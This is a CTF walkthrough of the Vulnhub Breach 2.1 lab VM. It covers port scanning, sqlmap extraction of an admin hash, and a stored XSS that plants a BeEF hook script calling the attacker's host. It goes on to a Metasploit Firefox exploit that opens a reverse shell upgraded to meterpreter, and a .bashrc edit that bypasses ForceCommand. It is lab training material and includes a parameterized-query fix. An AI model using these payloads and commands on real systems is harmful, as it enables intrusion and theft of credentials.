
Vulnhub-Breach: 2.1

Posted: 2023-05-12 11:22:08

Target VM: https://www.vulnhub.com/entry/breach-21,159/

Description: Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way.

Hint: Imagine this as a production environment during a busy work day.

Note: take a snapshot right after importing the VM; it saves trouble later on.

1. Host discovery

  • Kali: 192.168.110.128

  • Target: 192.168.110.151

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:01       VMware, Inc.
192.168.110.151 00:0c:29:a6:c7:3d       VMware, Inc.
192.168.110.254 00:50:56:f3:d9:5b       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.987 seconds (128.84 hosts/sec). 3 responded

2. Port scan

Run a full port scan. The default scan only covers common ports and Nmap's built-in port list; a full scan specifies every port, 0-65535, with the -p option, or simply -p-.

nmap -A -p- 192.168.110.151

Three ports are open; port 65535 is the SSH service.

┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 08:28 CST
Nmap scan report for 192.168.110.151
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
111/tcp   open rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto service
|   100000 2,3,4       111/tcp   rpcbind
|   100000 2,3,4       111/udp   rpcbind
|   100000 3,4         111/tcp6 rpcbind
|   100000 3,4         111/udp6 rpcbind
|   100024 1         33838/tcp   status
|   100024 1         40648/tcp6 status
|   100024 1         41391/udp   status
|_ 100024 1         49401/udp6 status
33838/tcp open status 1 (RPC #100024)
65535/tcp open ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
|   1024 f3539a0b4076b102873ea57aae859d26 (DSA)
|   2048 9aa8db784b444ffbe5836b67e3acfbf5 (RSA)
|   256 c163f1dc8f24818235fa881ab8734024 (ECDSA)
|_ 256 3b4d56375ec3457515cd85004f8ba85e (ED25519)
MAC Address: 00:0C:29:A6:C7:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.67 seconds

3. Port 80

Connecting to SSH opens port 80

The SSH banner hints that peter's password is inthesource, and the username peter is all lowercase.

  • Username: peter

  • Password: inthesource

The connection drops. The password should be right; the box is deliberately refusing to keep the session open.

┌──(root㉿kali)-[~]
└─# ssh peter@192.168.110.151 -p65535
The authenticity of host '[192.168.110.151]:65535 ([192.168.110.151]:65535)' can't be established.
ED25519 key fingerprint is SHA256:WSPZzGZPdZTVSHsFqYGt5lN1jqIM3ONgy68WbaOlZQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.110.151]:65535' (ED25519) to the list of known hosts.
#############################################################################
#                 Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded               #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#         Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
peter@192.168.110.151's password:
Connection to 192.168.110.151 closed.

Scanning the ports again, an HTTP service on port 80 shows up; it only opens once the SSH login as peter has succeeded.

nmap -sV -p- 192.168.110.151

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 08:44 CST
Nmap scan report for 192.168.110.151
Host is up (0.0037s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open http   Apache httpd 2.4.10 ((Debian))
111/tcp   open rpcbind 2-4 (RPC #100000)
33838/tcp open status 1 (RPC #100024)
65535/tcp open ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
MAC Address: 00:0C:29:A6:C7:3D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.66 seconds

4. Web exploitation

Open the site and view the source: two more cryptic lines, as if every sentence came with its own encryption.

Decoded:

I love hints! At Initech we don't trust our users, and neither should you!
I'm not just going to leave credentials lying around here, really, I'm not. Sorry.

A directory scan finds a blog

dirb http://192.168.110.151/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.110.151/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 10 08:56:58 2023
URL_BASE: http://192.168.110.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.110.151/ ----
==> DIRECTORY: http://192.168.110.151/blog/
==> DIRECTORY: http://192.168.110.151/images/
+ http://192.168.110.151/index.html (CODE:200|SIZE:468)
+ http://192.168.110.151/server-status (CODE:403|SIZE:303)

---- Entering directory: http://192.168.110.151/blog/ ----
+ http://192.168.110.151/blog/index.php (CODE:200|SIZE:5600)
+ http://192.168.110.151/blog/README (CODE:200|SIZE:721)
==> DIRECTORY: http://192.168.110.151/blog/smilies/
==> DIRECTORY: http://192.168.110.151/blog/wysiwyg/

---- Entering directory: http://192.168.110.151/images/ ----

---- Entering directory: http://192.168.110.151/blog/smilies/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.151/blog/wysiwyg/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
  (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed May 10 08:57:06 2023
DOWNLOADED: 13836 - FOUND: 4

It is a blog. Entering the SQL injection test string 1' or 1=1# in the search box confirms an injection.

Throw SQLMap at it; it dumps out the database blog.

sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dbs

available databases [5]:
[*] blog
[*] information_schema
[*] mysql
[*] oscommerce
[*] performance_schema
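To show why the search box is injectable and what the fix looks like, here is an added example (not code from the original post or from the blog software on the target): the same search implemented once by string concatenation and once with a bound parameter, against a constructed in-memory SQLite table. SQLite has no `#` comment, so the injected string ends with `-- ` instead of the `#` used against MySQL above.

```python
import sqlite3
from typing import List

# Constructed sample rows standing in for the blog's post table.
SAMPLE_POSTS = [
    ("Welcome to Initech", "public"),
    ("Vacation schedule", "public"),
    ("Server migration notes", "private"),
]

# Same idea as 1' or 1=1# on the page, with the SQLite line-comment token.
INJECTED_TERM = "1' or 1=1-- "


def build_db() -> sqlite3.Connection:
    """In-memory table that plays the role of the blog's posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT, visibility TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", SAMPLE_POSTS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    """The concatenation pattern behind the blog's injectable ?search= parameter.
    The user's text becomes part of the SQL grammar, so a quote closes the
    string literal and 'or 1=1' short-circuits the visibility filter."""
    sql = ("SELECT title FROM posts WHERE visibility = 'public' "
           "AND title LIKE '%" + term + "%'")
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn: sqlite3.Connection, term: str) -> List[str]:
    """Parameterized version: the term is bound as data and can never alter
    the query, whatever quotes or comment tokens it contains."""
    sql = ("SELECT title FROM posts WHERE visibility = 'public' "
           "AND title LIKE ?")
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def demo() -> dict:
    """Run both variants with a normal term and with the injected one."""
    conn = build_db()
    return {
        "normal_vulnerable": search_vulnerable(conn, "Vacation"),
        "normal_fixed": search_fixed(conn, "Vacation"),
        "injected_vulnerable": search_vulnerable(conn, INJECTED_TERM),
        "injected_fixed": search_fixed(conn, INJECTED_TERM),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the injected term the concatenated query returns every row, including the private post, while the parameterized query returns nothing because no title literally contains the injected text.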

Eventually a login credential that looks useful turns up

sqlmap -u "http://192.168.110.151/blog/index.php?search=" -D "oscommerce" -T "osc_administrators" --dump

Database: oscommerce
Table: osc_administrators
[1 entry]
+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
| 1 | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

MD5 lookup: https://www.somd5.com/

Note: the hash is salted; drop the 32 and the remainder resolves to the password (admin).

  • Username: admin

  • Password: admin

Try logging in over SSH

ssh admin@192.168.110.151 -p65535

┌──(root㉿kali)-[~]
└─# ssh admin@192.168.110.151 -p65535
#############################################################################
#                 Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded               #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#         Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
admin@192.168.110.151's password:
Permission denied, please try again.
admin@192.168.110.151's password:
Permission denied, please try again.
admin@192.168.110.151's password:
admin@192.168.110.151: Permission denied (publickey,password).

Try logging in to the blog

Both attempts fail, so another route is needed.

Testing shows the site does not filter user input at all: the search box has reflected XSS and the registration page has stored XSS.

Because the username entered at registration is not sanitized, a crafted XSS payload is stored in the database, and viewing the member profiles triggers the payload embedded in the username.

<script>alert(0)</script>

Put the XSS string in the username, fill in any password and email, and click Register

After registering, click Members

The stored XSS fires

The stored XSS can be leveraged to get a shell

5. Shell via XSS

Following the hint in the image on the site's home page, the BeEF framework can be used here. BeEF is a framework built specifically around XSS exploitation and bundles many XSS attack modules.

Start beef-xss

beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss

[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*]   Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
    Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
    Active: active (running) since Wed 2023-05-10 09:34:33 CST; 5s ago
  Main PID: 67501 (ruby)
    Tasks: 4 (limit: 4571)
    Memory: 98.5M
      CPU: 928ms
    CGroup: /system.slice/beef-xss.service
            └─67501 ruby /usr/share/beef-xss/beef

5月 10 09:34:35 kali beef[67501]: [ 9:34:34]   |   Blog: http://blog.beefproject.com
5月 10 09:34:35 kali beef[67501]: [ 9:34:34]   |_ Wiki: https://github.com/beefproject/beef/wiki
5月 10 09:34:35 kali beef[67501]: [ 9:34:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
5月 10 09:34:35 kali beef[67501]: -- migration_context()
5月 10 09:34:35 kali beef[67501]:   -> 0.0117s
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][*] BeEF is loading. Wait a few seconds...
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScrip…on: harmony
5月 10 09:34:35 kali beef[67501]: [ 9:34:35]   |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScrip…on: harmony
5月 10 09:34:35 kali beef[67501]: [ 9:34:35]   |_ [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
Hint: Some lines were ellipsized, use -l to show in full.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

The web UI opens automatically; log in to BeEF with the password you configured.

Register another user with the hook script in the username (any password and email), click Register, then visit Members to trigger the XSS.

Note: there is no logout link; clear the browser cache and refresh to log out (seriously...).

<script src="http://<IP>:3000/hook.js"></script>

Wait for the XSS to fire and BeEF to hook the browser. This takes a while, because the target triggers the XSS on its own schedule, so all you can do is wait.

Note: do not inject an alert-box XSS payload, otherwise the target's XSS trigger fails and BeEF never connects (I had to delete and re-import the VM at this point...).

Use a Metasploit browser exploit module to get a session; the target uses Firefox, so pick a Firefox module.

msfconsole

search firefox

use exploit/multi/browser/firefox_proto_crmfrequest

┌──(root㉿kali)-[~]
└─# msfconsole


                _---------.
            .' #######   ;."
.---,.   ;@             @@`;   .---,..
." @@@@@'.,'@@           @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@         @@@@@@@@@@@@@ @;
  `.@@@@@@@@@@@@       @@@@@@@@@@@@@@ .'
    "--'.@@@ -.@       @ ,'-   .'--"
        ".@' ; @       @ `. ;'
          |@@@@ @@@     @   .
            ' @@@ @@   @@   ,
            `.@@@@   @@   .
              ',@@     @   ;           _____________
                (   3 C   )     /|___ / Metasploit! \
                ;@'. __*__,."   \|--- \_____________/
                '(.,...."/


      =[ metasploit v6.2.36-dev                         ]
+ -- --=[ 2277 exploits - 1191 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all
available commands
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search firefox

Matching Modules
================

  #   Name                                                           Disclosure Date Rank       Check Description
  -   ----                                                           --------------- ----       ----- -----------
  0   exploit/windows/browser/adobe_flashplayer_avm                 2011-03-15       good       No     Adobe Flash Player AVM Bytecode Verification Vulnerability
  1   exploit/windows/browser/adobe_flashplayer_arrayindexing       2012-06-21       great     No     Adobe Flash Player AVM Verification Logic Array Indexing Code Execution
  2   exploit/multi/browser/adobe_flash_uncompress_zlib_uaf         2014-04-28       great     No     Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free
  3   exploit/multi/browser/adobe_flash_hacking_team_uaf             2015-07-06       great     No     Adobe Flash Player ByteArray Use After Free
  4   exploit/osx/browser/adobe_flash_delete_range_tl_op             2016-04-27       great     No     Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion
  5   exploit/multi/browser/adobe_flash_shader_drawing_fill         2015-05-12       great     No     Adobe Flash Player Drawing Fill Shader Memory Corruption
  6   exploit/multi/browser/adobe_flash_nellymoser_bof               2015-06-23       great     No     Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
  7   exploit/multi/browser/adobe_flash_net_connection_confusion     2015-03-12       great     No     Adobe Flash Player NetConnection Type Confusion
  8   exploit/multi/browser/adobe_flash_pixel_bender_bof             2014-04-28       great     No     Adobe Flash Player Shader Buffer Overflow
  9   exploit/multi/browser/adobe_flash_shader_job_overflow         2015-05-12       great     No     Adobe Flash Player ShaderJob Buffer Overflow
  10 exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23       great     No     Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
  11 exploit/multi/browser/adobe_flash_opaque_background_uaf       2015-07-06       great     No     Adobe Flash opaqueBackground Use After Free
  12 exploit/windows/browser/apple_quicktime_rtsp                   2007-01-01       normal     No     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
  13 exploit/windows/browser/apple_quicktime_texml_font_table       2012-11-07       normal     No     Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow
  14 exploit/windows/misc/itunes_extm3u_bof                         2012-06-21       normal     No     Apple iTunes 10 Extended M3U Stack Buffer Overflow
  15 exploit/windows/browser/awingsoft_winds3d_sceneurl             2009-11-14       excellent No     AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
  16 payload/firefox/shell_bind_tcp                                                 normal     No     Command Shell, Bind TCP (via Firefox XPCOM script)
  17 payload/firefox/shell_reverse_tcp                                               normal     No     Command Shell, Reverse TCP (via Firefox XPCOM script)
  18 exploit/multi/browser/firefox_svg_plugin                       2013-01-08       excellent No     Firefox 17.0.1 Flash Privileged Code Injection
  19 exploit/multi/browser/firefox_escape_retval                   2009-07-13       normal     No     Firefox 3.5 escape() Return Value Memory Corruption
  20 exploit/multi/browser/firefox_proto_crmfrequest               2013-08-06       excellent No     Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution
  21 exploit/windows/browser/mozilla_attribchildremoved             2011-12-06       average   No     Firefox 8/9 AttributeChildRemoved() Use-After-Free
  22 exploit/firefox/local/exec_shellcode                           2014-03-10       excellent No     Firefox Exec Shellcode from Privileged Javascript Shell
  23 post/firefox/gather/cookies                                   2014-03-26       normal     No     Firefox Gather Cookies from Privileged Javascript Shell
  24 post/firefox/gather/history                                   2014-04-11       normal     No     Firefox Gather History from Privileged Javascript Shell
  25 post/firefox/gather/passwords                                 2014-04-11       normal     No     Firefox Gather Passwords from Privileged Javascript Shell
  26 exploit/multi/browser/firefox_jit_use_after_free               2020-11-18       manual     No     Firefox MCallGetProperty Write Side Effects Use After Free Exploit
  27 auxiliary/gather/firefox_pdfjs_file_theft                                       normal     No     Firefox PDF.js Browser File Theft
  28 exploit/multi/browser/firefox_pdfjs_privilege_escalation       2015-03-31       manual     No     Firefox PDF.js Privileged Javascript Injection
  29 exploit/multi/browser/firefox_proxy_prototype                 2014-01-20       manual     No     Firefox Proxy Prototype Privileged Javascript Injection
  30 exploit/multi/browser/firefox_webidl_injection                 2014-03-17       excellent No     Firefox WebIDL Privileged Javascript Injection
  31 post/firefox/manage/webcam_chat                               2014-05-13       normal     No     Firefox Webcam Chat on Privileged Javascript Shell
  32 exploit/windows/browser/mozilla_firefox_xmlserializer         2013-01-08       normal     No     Firefox XMLSerializer Use After Free
  33 payload/firefox/exec                                                           normal     No     Firefox XPCOM Execute Command
  34 post/firefox/gather/xss                                                         normal     No     Firefox XSS
  35 exploit/multi/browser/firefox_queryinterface                   2006-02-02       normal     No     Firefox location.QueryInterface() Code Execution
  36 exploit/windows/browser/firefox_smil_uaf                       2016-11-30       normal     No     Firefox nsSMILTimeContainer::NotifyTimeChange() RCE
  37 exploit/windows/browser/mozilla_nssvgvalue                     2011-12-06       average   No     Firefox nsSVGValue Out-of-Bounds Access Vulnerability
  38 exploit/windows/browser/mozilla_firefox_onreadystatechange     2013-06-25       normal     No     Firefox onreadystatechange Event DocumentViewerImpl Use After Free
  39 exploit/multi/browser/firefox_tostring_console_injection       2013-05-14       excellent No     Firefox toString console.time Privileged Javascript Injection
  40 exploit/windows/browser/foxit_reader_plugin_url_bof           2013-01-07       normal     No     Foxit Reader Plugin URL Processing Buffer Overflow
  41 auxiliary/dos/http/gzip_bomb_dos                               2004-01-01       normal     No     Gzip Memory Bomb Denial Of Service
  42 exploit/multi/browser/java_jre17_exec                         2012-08-26       excellent No     Java 7 Applet Remote Code Execution
  43 exploit/multi/browser/java_rhino                               2011-10-18       excellent No     Java Applet Rhino Script Engine Remote Code Execution
  44 exploit/windows/browser/mozilla_nstreerange                   2011-02-02       normal     No     Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
  45 exploit/osx/browser/mozilla_mchannel                           2011-05-10       normal     No     Mozilla Firefox 3.6.16 mChannel Use-After-Free
  46 exploit/windows/browser/mozilla_mchannel                       2011-05-10       normal     No     Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
  47 exploit/windows/browser/mozilla_reduceright                   2011-06-21       normal     No     Mozilla Firefox Array.reduceRight() Integer Overflow
  48 exploit/multi/browser/firefox_xpi_bootstrapped_addon           2007-06-27       excellent No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
  49 exploit/windows/browser/mozilla_interleaved_write             2010-10-25       normal     No     Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
  50 exploit/multi/browser/mozilla_navigatorjava                   2006-07-25       normal     No     Mozilla Suite/Firefox Navigator Object Code Execution
  51 exploit/multi/browser/mozilla_compareto                       2005-07-13       normal     No     Mozilla Suite/Firefox compareTo() Code Execution
  52 post/multi/gather/firefox_creds                                                 normal     No     Multi Gather Firefox Signon Credential Collection
  53 post/multi/gather/ssh_creds                                                     normal     No     Multi Gather OpenSSH PKI Credentials Collection
  54 post/multi/manage/play_youtube                                                 normal     No     Multi Manage YouTube Broadcast
  55 exploit/windows/browser/samsung_security_manager_put           2016-08-05       excellent No     Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
  56 auxiliary/server/teamviewer_uri_smb_redirect                                   normal     No     TeamViewer Unquoted URI Handler SMB Redirect
  57 post/multi/manage/hsts_eraser                                                   normal     No     Web browsers HSTS entries eraser
  58 exploit/windows/browser/ms07_017_ani_loadimage_chunksize       2007-03-28       great     No     Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
  59 exploit/windows/local/ms15_051_client_copy_image               2015-05-12       normal     Yes   Windows ClientCopyImage Win32k Exploit
  60 post/windows/gather/forensics/browser_history                                   normal     No     Windows Gather Skype, Firefox, and Chrome Artifacts
  61 exploit/windows/browser/dxstudio_player_exec                   2009-06-09       excellent No     Worldweaver DX Studio Player shell.execute() Command Execution


Interact with a module by name or index. For example info 61, use 61 or use exploit/windows/browser/dxstudio_player_exec

msf6 > use exploit/multi/browser/firefox_proto_crmfrequest
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_proto_crmfrequest) >

Set the options and run

show options

set SRVHOST 192.168.110.128

set URIPATH msf

set LHOST 192.168.110.128

set LPORT 5868

run

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > show options

Module options (exploit/multi/browser/firefox_proto_crmfrequest):

  Name           Current Setting               Required Description
  ----           ---------------               -------- -----------
  ADDONNAME     HTML5 Rendering Enhancements yes       The addon name.
  AutoUninstall true                         yes       Automatically uninstall the addon after payload execution
  CONTENT                                     no       Content to display inside the HTML <body>.
  Retries       true                         no       Allow the browser to retry the module
  SRVHOST       0.0.0.0                       yes       The local host or network interface to listen on. This must be an address on the loca
                                                        l machine or 0.0.0.0 to listen on all addresses.
  SRVPORT       8080                         yes       The local port to listen on.
  SSL           false                         no       Negotiate SSL for incoming connections
  SSLCert                                     no       Path to a custom SSL certificate (default is randomly generated)
  URIPATH                                     no       The URI to use for this exploit (default is random)


Payload options (generic/shell_reverse_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  LHOST 127.0.0.1       yes       The listen address (an interface may be specified)
  LPORT 4444             yes       The listen port


Exploit target:

  Id Name
  -- ----
  0   Universal (Javascript XPCOM Shell)



View the full module info with the info, or info -d command.

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set SRVHOST 192.168.110.128
SRVHOST => 192.168.110.128
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set URIPATH msf
URIPATH => msf
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set LHOST 192.168.110.128
LHOST => 192.168.110.128
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set LPORT 5868
LPORT => 5868
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.110.128:5868
[*] Using URL: http://192.168.110.128:8080/msf
[*] Server started.
msf6 exploit(multi/browser/firefox_proto_crmfrequest) >

msf generates a URL; when the target browses to it, the browser is exploited and a session is established

http://192.168.110.128:8080/msf

Use BeEF's Redirect Browser command to send the hooked browser to the generated URL

Note: be quick, or the hooked browser goes offline

Session established

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > 
[*] 192.168.110.151 firefox_proto_crmfrequest - Gathering target information for 192.168.110.151
[*] 192.168.110.151 firefox_proto_crmfrequest - Sending HTML response to 192.168.110.151
[*] 192.168.110.151 firefox_proto_crmfrequest - Sending HTML
[*] 192.168.110.151 firefox_proto_crmfrequest - Sending the malicious addon
[*] Command shell session 1 opened (192.168.110.128:5868 -> 192.168.110.151:41228) at 2023-05-10 10:39:39 +0800

Use sessions to check for a session; if there is none, keep waiting and refreshing. Then upgrade the session to meterpreter for easier follow-up work.

sessions

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > sessions

Active sessions
===============

Id Name Type                   Information Connection
-- ---- ----                   ----------- ----------
1         shell firefox/firefox               192.168.110.128:5868 -> 192.168.110.151:41228 (192.168.110.151)

use post/multi/manage/shell_to_meterpreter

set session 1

run

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: firefox
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.110.128:4433
[*] Sending stage (1017704 bytes) to 192.168.110.151
[*] Meterpreter session 2 opened (192.168.110.128:4433 -> 192.168.110.151:52122) at 2023-05-10 11:27:35 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

Id Name Type                   Information             Connection
-- ---- ----                   -----------             ----------
1         shell firefox/firefox                           192.168.110.128:5868 -> 192.168.110.151:41335 (192.168.110.151)
2       meterpreter x86/linux peter @ 192.168.110.151 192.168.110.128:4433 -> 192.168.110.151:52122 (192.168.110.151)

msf6 post(multi/manage/shell_to_meterpreter) >

Select the meterpreter session; the current user is peter

msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > shell
Process 2139 created.
Channel 1 created.
whoami
peter

Upgrade the shell

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/bash")'
peter@breach2:~$ pwd
pwd
/home/peter
peter@breach2:~$

Since the SSH login as peter was kicked out earlier, look at the SSH configuration file first

cat /etc/ssh/sshd_config

peter@breach2:~$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 65535
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin no
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
AllowUsers peter
ForceCommand /usr/bin/startme
AddressFamily inet

SSH login as peter runs a program called startme. Its source shows that it just starts the Apache service, which is why port 80 only opens after a successful login as peter. The login is kicked out because the SSH session for peter only runs startme and then disconnects. So the goal is to make the SSH connection for peter hand over a shell instead.

cat /usr/bin/startme

peter@breach2:~$ cat /usr/bin/startme
cat /usr/bin/startme
#!/bin/bash

sudo /etc/init.d/apache2 start &> /dev/null

Note: ForceCommand

  • Forces execution of the command specified here, ignoring any command supplied by the client. The command is executed using the user's login shell (shell -c).

  • This applies to shell, command and subsystem requests, and it is usually used inside a Match block.

  • The command originally supplied by the client is available in the SSH_ORIGINAL_COMMAND environment variable.

The user's home directory contains a hidden file, .bashrc, which is loaded every time bash starts; in other words, logging in as peter loads the .bashrc in peter's home directory. Since the current user is peter, the files in peter's home directory are writable, so writing exec sh into .bashrc makes the SSH connection as peter run exec sh and hand over a shell.

ls -al

echo 'exec sh' > .bashrc

peter@breach2:~$ ls -al
ls -al
total 108
drwxr-xr-x 19 peter peter 4096 Jul 20 2016 .
drwxr-xr-x 5 root root 4096 Jun 19 2016 ..
-rw------- 1 peter peter 636 Jun 14 2016 .ICEauthority
-rw------- 1 peter peter   0 Jun 18 2016 .Xauthority
